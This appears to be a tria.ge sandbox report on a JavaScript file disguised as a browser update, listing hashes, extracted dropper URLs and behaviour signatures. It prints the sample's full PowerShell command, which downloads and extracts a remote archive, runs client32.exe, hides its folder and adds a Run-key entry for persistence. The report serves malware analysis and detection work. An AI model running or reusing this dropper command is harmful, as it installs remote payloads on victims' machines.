Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
16/04/2024, 12:43
General
-
Target
16042024_2042_Update_123.0.6312.107.js
-
Size
16.0MB
-
MD5
247bb3685fe1544f0f899f8df2db38cd
-
SHA1
6f6d97f854c901f2d32ad81df6c62ce5e6c4a25a
-
SHA256
be84be78a5ff8b06efa417f9a69b0eceafbe07bd2e61db88c4bac5757e38b5df
-
SHA512
98970cc7d0d46d1042bb7b2c3f531954e9140a9ee97fbe987779979b996a1501203c1c8cebec6bf7a5880cd56b8c77330e2ebc1c59b152377e1331b6f239c867
-
SSDEEP
49152:f7V7zjCxbzqHlp4LhyN0kghDzLZzjYzYsmCW+8z2V35//9SGGqHm3quVIKXgxcEc:O
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
https://gitkonus.com/data.php?14743
exe.dropper
https://gitkonus.com/data.php?14743
Signatures
-
Blocklisted process makes network request 5 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\16042024_2042_Update_123.0.6312.107.js1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $mvrufwdINvjaBX='https://gitkonus.com/data.php?14743';$mKNsLAVABTiEBixU=(New-Object System.Net.WebClient).DownloadString($mvrufwdINvjaBX);$IDWpXBSkLjdaKcBFjAcZeIhDuPJlbG=[System.Convert]::FromBase64String($mKNsLAVABTiEBixU);$zxc = Get-Random -Minimum -10 -Maximum 37; $sFGXXZSceCFKjSbyNLbwKQxPDPgN=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN -PathType Container)) { New-Item -Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN -ItemType Directory };$p=Join-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN 'BB.zip';[System.IO.File]::WriteAllBytes($p,$IDWpXBSkLjdaKcBFjAcZeIhDuPJlbG);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$sFGXXZSceCFKjSbyNLbwKQxPDPgN)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $sFGXXZSceCFKjSbyNLbwKQxPDPgN 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $sFGXXZSceCFKjSbyNLbwKQxPDPgN -Force; $AZ.attributes='Hidden';$s=$sFGXXZSceCFKjSbyNLbwKQxPDPgN+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB